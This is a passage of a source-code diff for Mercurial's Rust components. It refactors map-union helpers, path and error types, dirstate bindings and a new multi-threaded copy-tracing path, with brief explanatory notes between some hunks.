+ ordmap_union_with_merge_by_iter(left, right, merge)
+ } else if left.len() < right.len() / 2 {
+ // Same as above but with `left` and `right` swapped
+ ordmap_union_with_merge_by_iter(right, left, |key, a, b| {
+ // Also swapped in `merge` arguments:
+ match merge(key, b, a) {
+ MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v),
+ // … and swap back in `merge` result:
+ MergeResult::UseLeftValue => MergeResult::UseRightValue,
+ MergeResult::UseRightValue => MergeResult::UseLeftValue,
+ }
+ })
+ } else {
+ // For maps of similar size, use the algorithm based on `OrdMap::diff`
+ ordmap_union_with_merge_by_diff(left, right, merge)
+ }
+}
+
+/// Efficient if `right` is much smaller than `left`
+fn ordmap_union_with_merge_by_iter<K, V>(
+ mut left: OrdMap<K, V>,
+ right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone,
+{
+ for (key, right_value) in right {
+ match left.get(&key) {
+ None => {
+ left.insert(key, right_value);
+ }
+ Some(left_value) => match merge(&key, left_value, &right_value) {
+ MergeResult::UseLeftValue => {}
+ MergeResult::UseRightValue => {
+ left.insert(key, right_value);
+ }
+ MergeResult::UseNewValue(new_value) => {
+ left.insert(key, new_value);
+ }
+ },
+ }
+ }
+ left
+}
+
+/// Fallback when both maps are of similar size
+fn ordmap_union_with_merge_by_diff<K, V>(
+ mut left: OrdMap<K, V>,
+ mut right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone + PartialEq,
+{
+ // (key, value) pairs that would need to be inserted in either map
+ // in order to turn it into the union.
+ //
+ // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted,
+ // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>`
+ // with `left_updates` only borrowing from `right` and `right_updates` from
+ // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`.
+ //
+ // This would allow moving all `.clone()` calls to after we’ve decided
+ // which of `right_updates` or `left_updates` to use
+ // (value ones becoming `Cow::into_owned`),
+ // and avoid making clones we don’t end up using.
+ let mut left_updates = Vec::new();
+ let mut right_updates = Vec::new();
+
+ for difference in left.diff(&right) {
+ match difference {
+ DiffItem::Add(key, value) => {
+ left_updates.push((key.clone(), value.clone()))
+ }
+ DiffItem::Remove(key, value) => {
+ right_updates.push((key.clone(), value.clone()))
+ }
+ DiffItem::Update {
+ old: (key, left_value),
+ new: (_, right_value),
+ } => match merge(key, left_value, right_value) {
+ MergeResult::UseLeftValue => {
+ right_updates.push((key.clone(), left_value.clone()))
+ }
+ MergeResult::UseRightValue => {
+ left_updates.push((key.clone(), right_value.clone()))
+ }
+ MergeResult::UseNewValue(new_value) => {
+ left_updates.push((key.clone(), new_value.clone()));
+ right_updates.push((key.clone(), new_value))
+ }
+ },
+ }
+ }
+ if left_updates.len() < right_updates.len() {
+ for (key, value) in left_updates {
+ left.insert(key, value);
+ }
+ left
+ } else {
+ for (key, value) in right_updates {
+ right.insert(key, value);
+ }
+ right
+ }
+}
+
+/// Join items of the iterable with the given separator, similar to Python’s
+/// `separator.join(iter)`.
+///
+/// Formatting the return value consumes the iterator.
+/// Formatting it again will produce an empty string.
+pub fn join_display(
+ iter: impl IntoIterator<Item = impl fmt::Display>,
+ separator: impl fmt::Display,
+) -> impl fmt::Display {
+ JoinDisplay {
+ iter: Cell::new(Some(iter.into_iter())),
+ separator,
+ }
+}
+
+struct JoinDisplay<I, S> {
+ iter: Cell<Option<I>>,
+ separator: S,
+}
+
+impl<I, T, S> fmt::Display for JoinDisplay<I, S>
+where
+ I: Iterator<Item = T>,
+ T: fmt::Display,
+ S: fmt::Display,
+{
+ fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+ if let Some(mut iter) = self.iter.take() {
+ if let Some(first) = iter.next() {
+ first.fmt(f)?;
+ }
+ for value in iter {
+ self.separator.fmt(f)?;
+ value.fmt(f)?;
+ }
+ }
+ Ok(())
+ }
+}
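
A usage note on `join_display`: since the iterator is kept in a `Cell` and taken on the first format, the returned value is single-use, exactly as the doc comment warns. A sketch of a test pinning that behaviour down (assuming the helper above is in scope):

    #[test]
    fn join_display_is_single_use() {
        let joined = join_display(1..=3, ", ");
        assert_eq!(joined.to_string(), "1, 2, 3");
        // The first formatting consumed the iterator:
        assert_eq!(joined.to_string(), "");
    }
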
--- a/rust/hg-core/src/utils/files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils/files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -17,13 +17,13 @@
use lazy_static::lazy_static;
use same_file::is_same_file;
use std::borrow::{Cow, ToOwned};
+use std::ffi::OsStr;
use std::fs::Metadata;
-use std::io::Read;
use std::iter::FusedIterator;
use std::ops::Deref;
use std::path::{Path, PathBuf};
-pub fn get_path_from_bytes(bytes: &[u8]) -> &Path {
+pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr {
let os_str;
#[cfg(unix)]
{
@@ -33,16 +33,24 @@
// TODO Handle other platforms
// TODO: convert from WTF8 to Windows MBCS (ANSI encoding).
// Perhaps, the return type would have to be Result<PathBuf>.
+ os_str
+}
- Path::new(os_str)
+pub fn get_path_from_bytes(bytes: &[u8]) -> &Path {
+ Path::new(get_os_str_from_bytes(bytes))
}
// TODO: need to convert from WTF8 to MBCS bytes on Windows.
// that's why Vec<u8> is returned.
#[cfg(unix)]
pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> {
+ get_bytes_from_os_str(path.as_ref())
+}
+
+#[cfg(unix)]
+pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> {
use std::os::unix::ffi::OsStrExt;
- path.as_ref().as_os_str().as_bytes().to_vec()
+ str.as_ref().as_bytes().to_vec()
}
/// An iterator over repository path yielding itself and its ancestors.
@@ -191,6 +199,12 @@
st_ctime: metadata.ctime(),
}
}
+
+ pub fn is_symlink(&self) -> bool {
+ // This is way too manual, but `HgMetadata` will go away in the
+ // near-future dirstate rewrite anyway.
+ self.st_mode & 0o170000 == 0o120000
+ }
}
/// Returns the canonical path of `name`, given `cwd` and `root`
@@ -276,7 +290,13 @@
if cwd.as_ref().is_empty() {
Cow::Borrowed(path.as_bytes())
} else {
- let mut res: Vec<u8> = Vec::new();
+ // This is not entirely accurate as to how large `res` will actually be, but
+ // profiling `rhg files` on a large-ish repo shows it’s better than
+ // starting from a zero-capacity `Vec` and letting `extend` reallocate
+ // repeatedly.
+ let guesstimate = path.as_bytes().len();
+
+ let mut res: Vec<u8> = Vec::with_capacity(guesstimate);
let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable();
let mut cwd_iter =
cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable();
@@ -309,17 +329,6 @@
}
}
-/// Reads a file in one big chunk instead of doing multiple reads
-pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> {
- let mut file = std::fs::File::open(filepath)?;
- let size = file.metadata()?.len();
-
- let mut res = vec![0; size as usize];
- file.read_exact(&mut res)?;
-
- Ok(res)
-}
-
#[cfg(test)]
mod tests {
use super::*;
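
For the mode arithmetic in `is_symlink` above: `0o170000` is the Unix `S_IFMT` mask selecting the file-type bits, and `0o120000` is `S_IFLNK`. A standalone version of the same check:

    /// True when the file-type bits of a Unix `st_mode` mark a symlink.
    fn is_symlink(st_mode: u32) -> bool {
        st_mode & 0o170000 == 0o120000 // S_IFMT mask == S_IFLNK
    }

    fn main() {
        assert!(is_symlink(0o120777)); // lrwxrwxrwx
        assert!(!is_symlink(0o100644)); // regular file, rw-r--r--
        assert!(!is_symlink(0o040755)); // directory
    }
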
--- a/rust/hg-core/src/utils/hg_path.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils/hg_path.rs Tue Apr 20 11:01:06 2021 -0400
@@ -47,57 +47,68 @@
},
}
-impl ToString for HgPathError {
- fn to_string(&self) -> String {
+impl fmt::Display for HgPathError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
HgPathError::LeadingSlash(bytes) => {
- format!("Invalid HgPath '{:?}': has a leading slash.", bytes)
+ write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes)
}
HgPathError::ConsecutiveSlashes {
bytes,
second_slash_index: pos,
- } => format!(
+ } => write!(
+ f,
"Invalid HgPath '{:?}': consecutive slashes at pos {}.",
bytes, pos
),
HgPathError::ContainsNullByte {
bytes,
null_byte_index: pos,
- } => format!(
+ } => write!(
+ f,
"Invalid HgPath '{:?}': contains null byte at pos {}.",
bytes, pos
),
- HgPathError::DecodeError(bytes) => {
- format!("Invalid HgPath '{:?}': could not be decoded.", bytes)
- }
+ HgPathError::DecodeError(bytes) => write!(
+ f,
+ "Invalid HgPath '{:?}': could not be decoded.",
+ bytes
+ ),
HgPathError::EndsWithSlash(path) => {
- format!("Audit failed for '{}': ends with a slash.", path)
+ write!(f, "Audit failed for '{}': ends with a slash.", path)
}
- HgPathError::ContainsIllegalComponent(path) => format!(
+ HgPathError::ContainsIllegalComponent(path) => write!(
+ f,
"Audit failed for '{}': contains an illegal component.",
path
),
- HgPathError::InsideDotHg(path) => format!(
+ HgPathError::InsideDotHg(path) => write!(
+ f,
"Audit failed for '{}': is inside the '.hg' folder.",
path
),
HgPathError::IsInsideNestedRepo {
path,
nested_repo: nested,
- } => format!(
+ } => {
+ write!(f,
"Audit failed for '{}': is inside a nested repository '{}'.",
path, nested
- ),
- HgPathError::TraversesSymbolicLink { path, symlink } => format!(
+ )
+ }
+ HgPathError::TraversesSymbolicLink { path, symlink } => write!(
+ f,
"Audit failed for '{}': traverses symbolic link '{}'.",
path, symlink
),
- HgPathError::NotFsCompliant(path) => format!(
+ HgPathError::NotFsCompliant(path) => write!(
+ f,
"Audit failed for '{}': cannot be turned into a \
filesystem path.",
path
),
- HgPathError::NotUnderRoot { path, root } => format!(
+ HgPathError::NotUnderRoot { path, root } => write!(
+ f,
"Audit failed for '{}': not under root {}.",
path.display(),
root.display()
@@ -367,7 +378,9 @@
}
}
-#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)]
+#[derive(
+ Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From,
+)]
pub struct HgPathBuf {
inner: Vec<u8>,
}
@@ -408,12 +421,6 @@
}
}
-impl From<Vec<u8>> for HgPathBuf {
- fn from(vec: Vec<u8>) -> Self {
- Self { inner: vec }
- }
-}
-
impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf {
fn from(s: &T) -> HgPathBuf {
s.as_ref().to_owned()
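
The move from `ToString` to `fmt::Display` above is the idiomatic direction: the standard library's blanket `impl<T: fmt::Display> ToString for T` keeps `to_string()` working while also enabling direct use in `format!`/`write!`. A minimal sketch with a hypothetical error type:

    use std::fmt;

    struct PathError(u8);

    impl fmt::Display for PathError {
        fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
            write!(f, "invalid byte {:#04x}", self.0)
        }
    }

    fn main() {
        let err = PathError(0);
        // `to_string` comes for free from the blanket impl:
        assert_eq!(err.to_string(), "invalid byte 0x00");
        // ...and `Display` composes without an intermediate String:
        println!("error: {}", err);
    }
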
--- a/rust/hg-cpython/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,6 @@
[features]
default = ["python27"]
-dirstate-tree = ["hg-core/dirstate-tree"]
# Features to build an extension module:
python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"]
@@ -22,11 +21,12 @@
python3-bin = ["cpython/python3-sys"]
[dependencies]
+crossbeam-channel = "0.4"
hg-core = { path = "../hg-core"}
libc = '*'
log = "0.4.8"
env_logger = "0.7.1"
[dependencies.cpython]
-version = "0.4.1"
+version = "0.5.2"
default-features = false
--- a/rust/hg-cpython/src/copy_tracing.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/copy_tracing.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
use cpython::ObjectProtocol;
-use cpython::PyBool;
use cpython::PyBytes;
use cpython::PyDict;
+use cpython::PyDrop;
use cpython::PyList;
use cpython::PyModule;
use cpython::PyObject;
@@ -9,13 +9,63 @@
use cpython::PyTuple;
use cpython::Python;
-use hg::copy_tracing::combine_changeset_copies;
use hg::copy_tracing::ChangedFiles;
-use hg::copy_tracing::DataHolder;
-use hg::copy_tracing::RevInfo;
-use hg::copy_tracing::RevInfoMaker;
+use hg::copy_tracing::CombineChangesetCopies;
use hg::Revision;
+use self::pybytes_with_data::PyBytesWithData;
+
+// Module to encapsulate private fields
+mod pybytes_with_data {
+ use cpython::{PyBytes, Python};
+
+ /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice
+ /// that borrows it.
+ ///
+ /// Calling `PyBytes::data` requires a GIL marker but we want to access the
+ /// data in a thread that (ideally) does not need to acquire the GIL.
+ /// This type allows separating the call and the use.
+ pub(super) struct PyBytesWithData {
+ #[allow(unused)]
+ keep_alive: PyBytes,
+
+ /// Borrows the buffer inside `self.keep_alive`,
+ /// but the borrow-checker cannot express self-referential structs.
+ data: *const [u8],
+ }
+
+ fn require_send<T: Send>() {}
+
+ #[allow(unused)]
+ fn static_assert_pybytes_is_send() {
+ require_send::<PyBytes>();
+ }
+
+ // Safety: PyBytes is Send. Raw pointers are not by default,
+ // but here sending one to another thread is fine since we ensure it stays
+ // valid.
+ unsafe impl Send for PyBytesWithData {}
+
+ impl PyBytesWithData {
+ pub fn new(py: Python, bytes: PyBytes) -> Self {
+ Self {
+ data: bytes.data(py),
+ keep_alive: bytes,
+ }
+ }
+
+ pub fn data(&self) -> &[u8] {
+ // Safety: the raw pointer is valid as long as the PyBytes is still
+ // alive, and the returned slice borrows `self`.
+ unsafe { &*self.data }
+ }
+
+ pub fn unwrap(self) -> PyBytes {
+ self.keep_alive
+ }
+ }
+}
+
/// Combines copies information contained into revision `revs` to build a copy
/// map.
///
@@ -26,88 +76,135 @@
children_count: PyDict,
target_rev: Revision,
rev_info: PyObject,
- is_ancestor: PyObject,
+ multi_thread: bool,
) -> PyResult<PyDict> {
- let revs: PyResult<_> =
- revs.iter(py).map(|r| Ok(r.extract(py)?)).collect();
-
- // Wrap the `is_ancestor` python callback as a Rust closure
- //
- // No errors are expected from the Python side, and they will should only
- // happens in case of programing error or severe data corruption. Such
- // errors will raise panic and the rust-cpython harness will turn them into
- // Python exception.
- let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool {
- is_ancestor
- .call(py, (anc, desc), None)
- .expect(
- "rust-copy-tracing: python call to `is_ancestor` \
- failed",
- )
- .cast_into::<PyBool>(py)
- .expect(
- "rust-copy-tracing: python call to `is_ancestor` \
- returned unexpected non-Bool value",
- )
- .is_true()
- };
-
- // Wrap the `rev_info_maker` python callback as a Rust closure
- //
- // No errors are expected from the Python side, and they will should only
- // happens in case of programing error or severe data corruption. Such
- // errors will raise panic and the rust-cpython harness will turn them into
- // Python exception.
- let rev_info_maker: RevInfoMaker<PyBytes> =
- Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo {
- let res: PyTuple = rev_info
- .call(py, (rev,), None)
- .expect("rust-copy-tracing: python call to `rev_info` failed")
- .cast_into(py)
- .expect(
- "rust-copy_tracing: python call to `rev_info` returned \
- unexpected non-Tuple value",
- );
- let p1 = res.get_item(py, 0).extract(py).expect(
- "rust-copy-tracing: rev_info return is invalid, first item \
- is a not a revision",
- );
- let p2 = res.get_item(py, 1).extract(py).expect(
- "rust-copy-tracing: rev_info return is invalid, first item \
- is a not a revision",
- );
-
- let files = match res.get_item(py, 2).extract::<PyBytes>(py) {
- Ok(raw) => {
- // Give responsability for the raw bytes lifetime to
- // hg-core
- d.data = Some(raw);
- let addrs = d.data.as_ref().expect(
- "rust-copy-tracing: failed to get a reference to the \
- raw bytes for copy data").data(py);
- ChangedFiles::new(addrs)
- }
- // value was presumably None, meaning they was no copy data.
- Err(_) => ChangedFiles::new_empty(),
- };
-
- (p1, p2, files)
- });
- let children_count: PyResult<_> = children_count
+ let children_count = children_count
.items(py)
.iter()
.map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?)))
- .collect();
+ .collect::<PyResult<_>>()?;
+
+ /// (Revision number, parent 1, parent 2, copy data for this revision)
+ type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>);
+
+ let revs_info =
+ revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> {
+ let rev = rev_py.extract(py)?;
+ let tuple: PyTuple =
+ rev_info.call(py, (rev_py,), None)?.cast_into(py)?;
+ let p1 = tuple.get_item(py, 0).extract(py)?;
+ let p2 = tuple.get_item(py, 1).extract(py)?;
+ let opt_bytes = tuple.get_item(py, 2).extract(py)?;
+ Ok((rev, p1, p2, opt_bytes))
+ });
+
+ let path_copies;
+ if !multi_thread {
+ let mut combine_changeset_copies =
+ CombineChangesetCopies::new(children_count);
+
+ for rev_info in revs_info {
+ let (rev, p1, p2, opt_bytes) = rev_info?;
+ let files = match &opt_bytes {
+ Some(bytes) => ChangedFiles::new(bytes.data(py)),
+ // Python None was extracted to Option::None,
+ // meaning there was no copy data.
+ None => ChangedFiles::new_empty(),
+ };
+
+ combine_changeset_copies.add_revision(rev, p1, p2, files)
+ }
+ path_copies = combine_changeset_copies.finish(target_rev)
+ } else {
+ // Use a bounded channel to provide back-pressure:
+ // if the child thread is slower to process revisions than this thread
+ // is to gather data for them, an unbounded channel would keep
+ // growing and eat memory.
+ //
+ // TODO: tweak the bound?
+ let (rev_info_sender, rev_info_receiver) =
+ crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000);
+
+ // This channel (going the other way around) however is unbounded.
+ // If they were both bounded, there might potentially be deadlocks
+ // where both channels are full and both threads are waiting on each
+ // other.
+ let (pybytes_sender, pybytes_receiver) =
+ crossbeam_channel::unbounded();
- let res = combine_changeset_copies(
- revs?,
- children_count?,
- target_rev,
- rev_info_maker,
- &is_ancestor_wrap,
- );
+ // Start a thread that does CPU-heavy processing in parallel with the
+ // loop below.
+ //
+ // If the parent thread panics, `rev_info_sender` will be dropped and
+ // “disconnected”. `rev_info_receiver` will be notified of this and
+ // exit its own loop.
+ let thread = std::thread::spawn(move || {
+ let mut combine_changeset_copies =
+ CombineChangesetCopies::new(children_count);
+ for (rev, p1, p2, opt_bytes) in rev_info_receiver {
+ let files = match &opt_bytes {
+ Some(raw) => ChangedFiles::new(raw.data()),
+ // Python None was extracted to Option::None,
+ // meaning there was no copy data.
+ None => ChangedFiles::new_empty(),
+ };
+ combine_changeset_copies.add_revision(rev, p1, p2, files);
+
+ // Send `PyBytes` back to the parent thread so the parent
+ // thread can drop it. Otherwise the GIL would be implicitly
+ // acquired here through `impl Drop for PyBytes`.
+ if let Some(bytes) = opt_bytes {
+ if pybytes_sender.send(bytes.unwrap()).is_err() {
+ // The channel is disconnected, meaning the parent
+ // thread panicked or returned early through `?` to
+ // propagate a Python exception.
+ break;
+ }
+ }
+ }
+
+ combine_changeset_copies.finish(target_rev)
+ });
+
+ for rev_info in revs_info {
+ let (rev, p1, p2, opt_bytes) = rev_info?;
+ let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b));
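+            // Wrap each `PyBytes` so its raw data can later be read from
+            // the child thread without holding the GIL.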
+
+ // We’d prefer to avoid the child thread calling into Python code,
+ // but this avoids a potential deadlock on the GIL if it does:
+ py.allow_threads(|| {
+ rev_info_sender.send((rev, p1, p2, opt_bytes)).expect(
+ "combine_changeset_copies: channel is disconnected",
+ );
+ });
+
+ // Drop anything in the channel, without blocking
+ for pybytes in pybytes_receiver.try_iter() {
+ pybytes.release_ref(py)
+ }
+ }
+ // We’d prefer to avoid the child thread calling into Python code,
+ // but this avoids a potential deadlock on the GIL if it does:
+ path_copies = py.allow_threads(|| {
+ // Disconnect the channel to signal the child thread to stop:
+ // the `for … in rev_info_receiver` loop will end.
+ drop(rev_info_sender);
+
+ // Wait for the child thread to stop, and propagate any panic.
+ thread.join().unwrap_or_else(|panic_payload| {
+ std::panic::resume_unwind(panic_payload)
+ })
+ });
+
+ // Drop anything left in the channel
+ for pybytes in pybytes_receiver.iter() {
+ pybytes.release_ref(py)
+ }
+ };
+
let out = PyDict::new(py);
- for (dest, source) in res.into_iter() {
+ for (dest, source) in path_copies.into_iter() {
out.set_item(
py,
PyBytes::new(py, &dest.into_vec()),
@@ -135,7 +232,7 @@
children: PyDict,
target_rev: Revision,
rev_info: PyObject,
- is_ancestor: PyObject
+ multi_thread: bool
)
),
)?;
--- a/rust/hg-cpython/src/dirstate.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate.rs Tue Apr 20 11:01:06 2021 -0400
@@ -24,10 +24,7 @@
exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult,
PySequence, Python,
};
-use hg::{
- utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState,
- StateMap,
-};
+use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap};
use libc::{c_char, c_int};
use std::convert::TryFrom;
@@ -79,11 +76,10 @@
.map(|(filename, stats)| {
let stats = stats.extract::<PySequence>(py)?;
let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?;
- let state = EntryState::try_from(state.data(py)[0]).map_err(
- |e: DirstateParseError| {
+ let state =
+ EntryState::try_from(state.data(py)[0]).map_err(|e| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
- },
- )?;
+ })?;
let mode = stats.get_item(py, 1)?.extract(py)?;
let size = stats.get_item(py, 2)?.extract(py)?;
let mtime = stats.get_item(py, 3)?.extract(py)?;
--- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -18,9 +18,9 @@
use crate::dirstate::extract_dirstate;
use hg::{
+ errors::HgError,
utils::hg_path::{HgPath, HgPathBuf},
- DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError,
- EntryState,
+ DirsMultiset, DirsMultisetIter, DirstateMapError, EntryState,
};
py_class!(pub class Dirs |py| {
@@ -38,7 +38,7 @@
skip_state = Some(
skip.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
);
@@ -46,7 +46,7 @@
let inner = if let Ok(map) = map.cast_as::<PyDict>(py) {
let dirstate = extract_dirstate(py, &map)?;
DirsMultiset::from_dirstate(&dirstate, skip_state)
- .map_err(|e| {
+ .map_err(|e: DirstateMapError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?
} else {
--- a/rust/hg-cpython/src/dirstate/dirstate_map.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs Tue Apr 20 11:01:06 2021 -0400
@@ -14,8 +14,8 @@
use cpython::{
exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList,
- PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
- UnsafePyLeaked,
+ PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject,
+ ToPyObject, UnsafePyLeaked,
};
use crate::{
@@ -24,12 +24,14 @@
NonNormalEntries, NonNormalEntriesIterator,
},
dirstate::{dirs_multiset::Dirs, make_dirstate_tuple},
+ parsers::dirstate_parents_to_pytuple,
};
use hg::{
+ errors::HgError,
+ revlog::Node,
utils::hg_path::{HgPath, HgPathBuf},
DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap,
- DirstateMapError, DirstateParents, DirstateParseError, EntryState,
- StateMapIter, PARENT_SIZE,
+ DirstateMapError, DirstateParents, EntryState, StateMapIter,
};
// TODO
@@ -84,13 +86,13 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
DirstateEntry {
state: state.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
mode: mode.extract(py)?,
@@ -113,7 +115,7 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
size.extract(py)?,
@@ -137,7 +139,7 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
)
@@ -173,18 +175,11 @@
let (_, other_parent) =
inner_shared.get_non_normal_other_parent_entries();
- let locals = PyDict::new(py);
- locals.set_item(
- py,
- "other_parent",
- other_parent
- .iter()
- .map(|v| PyBytes::new(py, v.as_bytes()))
- .collect::<Vec<PyBytes>>()
- .to_py_object(py),
- )?;
-
- py.eval("set(other_parent)", None, Some(&locals))
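+        // Build the set directly with `PySet` instead of evaluating
+        // Python source with `py.eval`.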
+ let set = PySet::empty(py)?;
+ for path in other_parent.iter() {
+ set.add(py, PyBytes::new(py, path.as_bytes()))?;
+ }
+ Ok(set.into_object())
}
def non_normal_entries(&self) -> PyResult<NonNormalEntries> {
@@ -285,10 +280,7 @@
def parents(&self, st: PyObject) -> PyResult<PyTuple> {
self.inner(py).borrow_mut()
.parents(st.extract::<PyBytes>(py)?.data(py))
- .and_then(|d| {
- Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2))
- .to_py_object(py))
- })
+ .map(|parents| dirstate_parents_to_pytuple(py, parents))
.or_else(|_| {
Err(PyErr::new::<exc::OSError, _>(
py,
@@ -311,9 +303,8 @@
.read(st.extract::<PyBytes>(py)?.data(py))
{
Ok(Some(parents)) => Ok(Some(
- (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2))
- .to_py_object(py)
- .into_object(),
+ dirstate_parents_to_pytuple(py, parents)
+ .into_object()
)),
Ok(None) => Ok(Some(py.None())),
Err(_) => Err(PyErr::new::<exc::OSError, _>(
@@ -549,14 +540,12 @@
) -> Ref<'a, RustDirstateMap> {
self.inner(py).borrow()
}
- #[cfg(not(feature = "dirstate-tree"))]
fn translate_key(
py: Python,
res: (&HgPathBuf, &DirstateEntry),
) -> PyResult<Option<PyBytes>> {
Ok(Some(PyBytes::new(py, res.0.as_bytes())))
}
- #[cfg(not(feature = "dirstate-tree"))]
fn translate_key_value(
py: Python,
res: (&HgPathBuf, &DirstateEntry),
@@ -567,24 +556,6 @@
make_dirstate_tuple(py, &entry)?,
)))
}
- #[cfg(feature = "dirstate-tree")]
- fn translate_key(
- py: Python,
- res: (HgPathBuf, DirstateEntry),
- ) -> PyResult<Option<PyBytes>> {
- Ok(Some(PyBytes::new(py, res.0.as_bytes())))
- }
- #[cfg(feature = "dirstate-tree")]
- fn translate_key_value(
- py: Python,
- res: (HgPathBuf, DirstateEntry),
- ) -> PyResult<Option<(PyBytes, PyObject)>> {
- let (f, entry) = res;
- Ok(Some((
- PyBytes::new(py, f.as_bytes()),
- make_dirstate_tuple(py, &entry)?,
- )))
- }
}
py_shared_iterator!(
@@ -601,7 +572,7 @@
Option<(PyBytes, PyObject)>
);
-fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> {
+fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> {
let bytes = obj.extract::<PyBytes>(py)?;
match bytes.data(py).try_into() {
Ok(s) => Ok(s),
--- a/rust/hg-cpython/src/parsers.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/parsers.rs Tue Apr 20 11:01:06 2021 -0400
@@ -15,8 +15,7 @@
};
use hg::{
pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry,
- DirstatePackError, DirstateParents, DirstateParseError, FastHashMap,
- PARENT_SIZE,
+ DirstateParents, FastHashMap, PARENT_SIZE,
};
use std::convert::TryInto;
@@ -54,26 +53,9 @@
PyBytes::new(py, copy_path.as_bytes()),
)?;
}
- Ok(
- (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2))
- .to_py_object(py),
- )
+ Ok(dirstate_parents_to_pytuple(py, parents))
}
- Err(e) => Err(PyErr::new::<exc::ValueError, _>(
- py,
- match e {
- DirstateParseError::TooLittleData => {
- "too little data for parents".to_string()
- }
- DirstateParseError::Overflow => {
- "overflow in dirstate".to_string()
- }
- DirstateParseError::CorruptedEntry(e) => e,
- DirstateParseError::Damaged => {
- "dirstate appears to be damaged".to_string()
- }
- },
- )),
+ Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())),
}
}
@@ -128,18 +110,9 @@
}
Ok(PyBytes::new(py, &packed))
}
- Err(error) => Err(PyErr::new::<exc::ValueError, _>(
- py,
- match error {
- DirstatePackError::CorruptedParent => {
- "expected a 20-byte hash".to_string()
- }
- DirstatePackError::CorruptedEntry(e) => e,
- DirstatePackError::BadSize(expected, actual) => {
- format!("bad dirstate size: {} != {}", actual, expected)
- }
- },
- )),
+ Err(error) => {
